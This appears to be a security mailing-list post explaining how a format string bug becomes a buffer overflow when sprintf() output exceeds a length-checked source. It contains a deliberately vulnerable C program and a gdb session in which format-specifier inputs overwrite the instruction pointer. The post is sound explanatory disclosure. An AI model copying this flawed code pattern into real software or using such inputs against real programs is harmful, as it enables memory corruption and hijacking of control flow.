Format string bug becomes buffer overflow, because of bad length assumption

Hello,

I don't know if this is new or not, but I thought I should post it anyway.
A format string bug can also be a buffer overflow, in the special case where
the program author uses sprintf() and thinks that the size of the destination
is the same as the size of the source. This could be in the form of a strlen()
check or a malloc() that allocates as much space for the destination as the
source takes. There are many ways to make the sprintf() destination longer
than its source. Here's an example:

$ cat isuck.c
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

int main(int argc, char *argv[])
{
  char buf[80];

  if (argc < 2) { puts("no arguments"); exit(1); }
  if (strlen(argv[1]) > 79) { puts("too long argument"); exit(2); }

  sprintf(buf, argv[1]); /* I suck! */

  printf("buf --%s-- %d\n", buf, strlen(buf));

  return 0;
}
$ gcc -Wall -O2 -pedantic -ansi -o isuck isuck.c
$ ./isuck
no arguments
$ ./isuck ''
buf ---- 0
$ ./isuck a
buf --a-- 1
$ ./isuck ab
buf --ab-- 2
$ ./isuck abc
buf --abc-- 3
$ ./isuck
UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU
too long argument
$ ./isuck
UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU
buf
--UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU--
79
$ ./isuck
UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU
buf
--UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU--
78
$ gdb ./isuck
GNU gdb 6.1-debian
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-linux"...Using host libthread_db library
"/lib/libthread_db.so.1".

(gdb) r %x%x%x%x%x%x%x%x%x%x%xUUUUUUUU
Starting program: /home/metaur/isuck %x%x%x%x%x%x%x%x%x%x%xUUUUUUUU
buf
--4009063e40151620393030346533363035313034303236313033393334333033333335363033363331333533UUUUUUUU--
96

Program received signal SIGSEGV, Segmentation fault.
0x55555555 in ?? ()
(gdb) i r
eax            0x0      0
ecx            0x4014b080       1075097728
edx            0x6c     108
ebx            0x33333533       858993971
esp            0xbffffb40       0xbffffb40
ebp            0x55555555       0x55555555
esi            0x400164a0       1073833120
edi            0xbffffb94       -1073742956
eip            0x55555555       0x55555555
eflags         0x10246  66118
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x0      0
(gdb) r %92xUUUU
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/metaur/isuck %92xUUUU
buf --                                                                          
         4009063eUUUU-- 96

Program received signal SIGSEGV, Segmentation fault.
0x55555555 in ?? ()
(gdb) i r
eax            0x0      0
ecx            0x4014b080       1075097728
edx            0x6c     108
ebx            0x39303034       959459380
esp            0xbffffb50       0xbffffb50
ebp            0x65333630       0x65333630
esi            0x400164a0       1073833120
edi            0xbffffba4       -1073742940
eip            0x55555555       0x55555555
eflags         0x10246  66118
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x0      0
(gdb) q
The program is running.  Exit anyway? (y or n) y
$

-- 
Ulf Harnhammar
http://www.advogato.org/person/metaur/